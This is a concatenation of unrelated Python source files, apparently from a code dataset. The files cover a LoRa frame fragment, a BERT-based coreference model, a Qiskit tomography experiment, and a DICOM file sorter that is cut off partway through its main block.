frame = type + "::" + self.get_lora_mac() + "::" + data
print("Link Layer:" + frame)
return frame
def unpack_frame(self, frame):
meta = [frame.split("::")[0], frame.split("::")[1]]
data = frame.split("::")[2]
return meta, data
|
gold_mentions.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import os
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
class CorefModel(object):
def __init__(self, config):
self.config = config
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.subtoken_maps = {}
self.gold = {}
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# bert stuff
tvars = tf.trainable_variables()
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['init_checkpoint'])
tf.train.init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1)
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
tensorized = self.tensorize_example(example, is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids = [], [], []
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 3) for s in speaker]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
assert num_words == np.sum(input_mask), (num_words, np.sum(input_mask))
# speaker_dict = { s:i for i,s in enumerate(set(speakers)) }
# speaker_ids = np.array([speaker_dict[s] for s in speakers])
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example["subtoken_map"]
self.gold[doc_key] = example["clusters"]
genre = self.genres.get(doc_key[:2], 0)
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
if self.config['single_example']:
return self.truncate_example(*example_tensors)
else:
offsets = range(self.config['max_training_sentences'], len(sentences), self.config['max_training_sentences'])
tensor_list = [self.truncate_example(*(example_tensors + (offset,))) for offset in offsets]
return tensor_list
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, c]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, c]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
all_encoder_layers = model.get_all_encoder_layers()
mention_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(mention_doc)[0]
max_sentence_length = tf.shape(mention_doc)[1]
mention_doc = self.flatten_emb_by_sentence(mention_doc, input_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_doc
flattened_sentence_indices = sentence_map
candidate_starts, candidate_ends = tf.clip_by_value(tf.concat([gold_starts, [0]], -1), 0, num_words-1), tf.clip_by_value(tf.concat([gold_ends, [0]], -1), 0, num_words-1)
#candidate_ends = tf.Print(candidate_ends, [candidate_ends])
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, input_mask)
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]i
else:
top_span_speaker_ids = None
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(input_ids, 0), util.shape(input_ids, 1)
word_segments = tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len])
flat_word_segments = tf.boolean_mask(tf.reshape(word_segments, [-1]), tf.reshape(input_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [K, T]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]]) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]]), segment_distance) # [k, emb]
span_width_emb = tf.nn.dropout(segment_distance_emb, self.dropout)
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False):
self.load_eval_data()
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
losses = []
doc_keys = []
num_evaluated= 0
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
_, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# if tensorized_example[0].shape[0] <= 9:
# if keys is not None and example['doc_key'] in keys:
# print('Skipping...', example['doc_key'], tensorized_example[0].shape)
# continue
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
# losses.append(session.run(self.loss, feed_dict=feed_dict))
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
summary_dict = {}
# with open('doc_keys_512.txt', 'w') as f:
# for key in doc_keys:
# f.write(key + '\n')
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout)
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
return util.make_summary(summary_dict), f
|
compare_Wchain_sgd_1layers.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_wchain(num_layers, num_qubits):
thetas = np.ones(num_layers*num_qubits*4)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_chain: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Wchain_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Wchain_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Wchain_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writting ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1]
num_qubits = [2, 3, 4, 5, 6]
t_wchains = []
for i in num_layers:
for j in num_qubits:
t_wchains.append(multiprocessing.Process(target = run_wchain, args=(i, j)))
for t_wchain in t_wchains:
t_wchain.start()
for t_wchain in t_wchains:
t_wchain.join()
print("Done!")
|
dicom_file_classifier.py
|
import os
import os.path
import pydicom
import shutil
from multiprocessing import Process
import time
# set initial values
src_path = "dicom file directory"
des_path = "destination directory"
process_count = 10 # number of process you use
def sd_form(str): # Series Description
str = str.replace(' ', '_')
str = str.replace('<', '_')
str = str.replace('>', '_')
str = str.upper()
return str
def sn_form(str): # Series Number
str = str.zfill(4)
return str
def pn_form(str): # Patient Number
str = str.replace(' ', '_')
str = str.upper()
return str
def create_folder(dir): # create new folder # only if folder doesn't exists
if os.path.isdir(dir):
return
try:
os.makedirs(dir)
print(f"Folder created \"{dir}\"")
except FileExistsError:
print(f"[Error] while creating new folder \"{dir}\"")
def get_dirs(path):
dir_list = list()
dirs = os.listdir(path)
for dir in dirs:
dir_path = os.path.join(path, dir)
if os.path.isdir(dir_path):
dir_list.append(dir_path)
return dir_list
def split_num(num, divisor): # set number of folders allocated to a process
l = list()
range_list = list()
q, r = divmod(num, divisor)
for i in range(divisor):
l.append(q)
for i in range(r):
l[i] += 1
for i, n in enumerate(l):
n += sum(l[:i])
range_list.append(n)
return range_list
def split_list(dir_list, num_pr):
total = list()
num_dir = len(dir_list)
range_list = split_num(num_dir, num_pr)
index = 0
for n in range_list:
total.append(dir_list[index:n])
index = n
return total
def create_dcm_folder(id, new_path, path_list):
for path in path_list:
for root, dirs, files in os.walk(path):
rootpath = os.path.join(path, root)
for file in files:
filepath =os.path.join(rootpath, file)
# data elements info for foldername
try:
ds = pydicom.dcmread(filepath, specific_tags=['SeriesDescription','SeriesNumber','PatientName','PatientID'])
except:
continue
series_des = sd_form(str(ds.SeriesDescription))
series_num = sn_form(str(ds.SeriesNumber))
patient_name = pn_form(str(ds.PatientName))
patient_id = str(ds.PatientID)
parentF_name = f'{patient_name}_{patient_id}'
subF_name = f'{series_des}_{series_num}'
new_folder_path = os.path.join(new_path, parentF_name, subF_name)
create_folder(new_folder_path)
shutil.copy2(filepath, new_folder_path) # copy file # (filepath) > (new_folder_path)
##################################################
if __name__ == "__main__":
start = time.time()
path = os.path.abspath(src_path)
new_path = os.path.abspath(des_path)
